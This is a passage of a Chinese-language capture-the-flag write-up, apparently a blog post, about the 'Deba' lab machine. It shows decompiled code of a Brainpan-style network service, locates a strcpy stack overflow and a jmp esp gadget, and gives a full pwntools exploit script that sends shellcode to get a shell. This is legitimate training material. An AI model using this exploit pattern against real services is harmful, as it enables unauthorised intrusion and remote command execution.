\u6210\u529f\u6ea2\u51fa\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Deba]\n\u2514\u2500$ \/usr\/share\/metasploit-framework\/tools\/exploit\/pattern_offset.rb -q 0x35724134\n[*] Exact match at offset 524<\/code><\/pre>\n
\u68c0\u67e5\u73af\u5883\u914d\u7f6e<\/h4>\n
(remote) debian@debian:\/opt\/Buffer-Overflow-Vulnerable-app$ cat \/proc\/sys\/kernel\/randomize_va_space \n2\n(remote) debian@debian:\/opt\/Buffer-Overflow-Vulnerable-app$ cat NOTE.txt \nYou can use this machine to practice BoF if you get root :D<\/code><\/pre>\n
ASLR\uff1a0\u6ca1\u6709\u5f00\u542f\uff0c1\u534a\u968f\u673a\uff0c2\u5168\u968f\u673a<\/strong>\u3002\u3002\u3002\u3002\u3002\u3002\u3002<\/p>\n
\u628abrainfuck<\/code>\u62ff\u5230\u672c\u5730\u8fdb\u884c\u6d4b\u8bd5\uff1a<\/p>\n
int __cdecl main(int argc, const char **argv, const char **envp)\n{\n  int v3; \/\/ eax\n  int v4; \/\/ eax\n  int v5; \/\/ eax\n  int v6; \/\/ eax\n  int v7; \/\/ eax\n  int v8; \/\/ eax\n  int v9; \/\/ eax\n  char *Format; \/\/ [esp+0h] [ebp-608h]\n  struct sockaddr addr; \/\/ [esp+30h] [ebp-5D8h]\n  struct sockaddr name; \/\/ [esp+40h] [ebp-5C8h]\n  SOCKET v14; \/\/ [esp+58h] [ebp-5B0h]\n  SOCKET s; \/\/ [esp+5Ch] [ebp-5ACh]\n  struct WSAData WSAData; \/\/ [esp+60h] [ebp-5A8h]\n  int v17; \/\/ [esp+1F8h] [ebp-410h]\n  int v18; \/\/ [esp+1FCh] [ebp-40Ch]\n  int addrlen; \/\/ [esp+200h] [ebp-408h]\n  char *buf; \/\/ [esp+204h] [ebp-404h]\n  char *v21; \/\/ [esp+208h] [ebp-400h]\n  char *Str; \/\/ [esp+20Ch] [ebp-3FCh]\n  char Dst; \/\/ [esp+210h] [ebp-3F8h]\n\n  _alloca((size_t)Format);\n  __main();\n  Str = "_|                            _|                                        \\n"\n        "_|_|_|    _|  _|_|    _|_|_|      _|_|_|    _|_|_|      _|_|_|  _|_|_|  \\n"\n        "_|    _|  _|_|      _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|\\n"\n        "_|    _|  _|        _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|\\n"\n        "_|_|_|    _|          _|_|_|  _|  _|    _|  _|_|_|      _|_|_|  _|    _|\\n"\n        "                                            _|                          \\n"\n        "                                            _|\\n"\n        "\\n"\n        "[________________________ WELCOME TO BRAINPAN _________________________]\\n"\n        "                          ENTER THE PASSWORD                              \\n"\n        "\\n"\n        "                          >> ";\n  v21 = "                          ACCESS DENIED\\n";\n  buf = "                          ACCESS GRANTED\\n";\n  v18 = 9999;\n  v17 = 1;\n  printf("[+] initializing winsock...");\n  if ( WSAStartup(0x202u, &WSAData) )\n  {\n    v3 = WSAGetLastError();\n    printf("[!] winsock init failed: %d", v3);\n  }\n  else\n  {\n    printf("done.\\n");\n    s = socket(2, 1, 0);\n    if ( s == -1 )\n    {\n      v4 = WSAGetLastError();\n      printf("[!] could not create socket: %d", v4);\n    }\n    printf("[+] server socket created.\\n");\n    name.sa_family = 2;\n    *(_DWORD *)&name.sa_data[2] = 0;\n    *(_WORD *)name.sa_data = htons(0x270Fu);\n    if ( bind(s, &name, 16) == -1 )\n    {\n      v5 = WSAGetLastError();\n      printf("[!] bind failed: %d", v5);\n    }\n    printf("[+] bind done on port %d\\n", v18);\n    listen(s, 3);\n    printf("[+] waiting for connections.\\n");\n    addrlen = 16;\n    while ( 1 )\n    {\n      v14 = accept(s, &addr, &addrlen);\n      if ( v14 == -1 )\n        break;\n      printf("[+] received connection.\\n");\n      memset(&Dst, 0, 0x3E8u);\n      v6 = strlen(Str);\n      send(v14, Str, v6, 0);\n      recv(v14, &Dst, 1000, 0);\n      v17 = get_reply(&Dst);\n      printf("[+] check is %d\\n", v17);\n      if ( get_reply(&Dst) )\n      {\n        v8 = strlen(buf);\n        send(v14, v21, v8, 0);\n      }\n      else\n      {\n        v7 = strlen(v21);\n        send(v14, buf, v7, 0);\n      }\n      closesocket(v14);\n    }\n    v9 = WSAGetLastError();\n    printf("[!] accept failed: %d", v9);\n  }\n  return 1;\n}<\/code><\/pre>\n
\u53d1\u73b0Dst<\/code>\u662f\u6808\u4e0a\u5206\u914d\u7684\u7f13\u51b2\u533a0x3F8 - 0x210 = 1000\u5b57\u8282<\/code>\uff0c\u4f46\u662f\u672a\u53d1\u73b0\u5229\u7528\u70b9\uff0c\u770b\u4e00\u4e0b\u5176\u4ed6\u51fd\u6570\uff1a<\/p>\n
int __cdecl get_reply(char *Source)\n{\n  size_t v1; \/\/ eax\n  char Dest; \/\/ [esp+10h] [ebp-208h]\n\n  printf("[get_reply] s = [%s]\\n", Source);\n  strcpy(&Dest, Source);\n  v1 = strlen(&Dest);\n  printf("[get_reply] copied %d bytes to buffer\\n", v1);\n  return strcmp(&Dest, "shitstorm\\n");\n}<\/code><\/pre>\n
\u53d1\u73b0\u5229\u7528\u70b9strcpy<\/code>\u6ea2\u51fa\u3002\u3002<\/p>\n
\u641c\u7d22ret_addr<\/h4>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Deba]\n\u2514\u2500$ ropper --file brainfuck.exe --search 'jmp esp'\n[INFO] Load gadgets from cache\n[LOAD] loading... 100%\n[LOAD] removing double gadgets... 100%\n[INFO] Searching for gadgets: jmp esp\n\n[INFO] File: brainfuck.exe\n0x311712f3: jmp esp; \n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Deba]\n\u2514\u2500$ objdump -D brainfuck.exe | grep jmp | grep esp\n311712f3:       ff e4                   jmp    *%esp<\/code><\/pre>\n
\u5c1d\u8bd5\u6ea2\u51fa<\/h4>\n
from pwn import *\n\ncontext.update(os='linux', arch='i386')\ntarget_ip = '192.168.10.102'\ntarget_port = 9999\n\njunk = b'a' * 524\nret_addr = p32(0x311712f3)\n# execve("\/bin\/sh") shellcode\uff0832\u4f4d\uff09\nshellcode = asm(shellcraft.sh())\n\npayload = junk + ret_addr + shellcode\n\ntry:\n    conn = remote(target_ip, target_port)\n    conn.recvuntil(b'>>')\n\n    # \u53d1\u9001 Payload\n    conn.send(payload)\n    log.info(f"[+] Exploit!!!!!")\n    conn.interactive()\n\nexcept Exception as e:\n    log.error(f"[-] Exploit failed: {e}")\nfinally:\n    conn.close()                      <\/code><\/pre>\n
\"image-20250617230243806\"<\/div>
\n
\"image-20250617230256705\"<\/div><\/p>\n
\u5636\u3002\u3002\u3002\u3002\u3002\u53ef\u80fd\u6709\u8fd0\u6c14\u6210\u5206\u3002<\/p>\n
\u6211\u8bb0\u5f97brainfuck<\/code>\u662f\u4e00\u4e2a\u52a0\u5bc6\u65b9\u5f0f\uff0c\u4e0d\u77e5\u9053\u8fd9\u9898\u548c\u8fd9\u4e2a\u662f\u4e0d\u662f\u6709\u5565\u5173\u7cfb\u3002\u3002\u3002\u3002<\/p>\n
\"image-20250617161522551\"<\/div><\/p>\n","protected":false},"excerpt":{"rendered":"
Deba \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf \u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Deba] \u2514\u2500$ rustsca […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,19,18],"tags":[],"class_list":["post-886","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-pwn","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/886","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=886"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/886\/revisions"}],"predecessor-version":[{"id":887,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/886\/revisions\/887"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=886"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=886"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=886"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}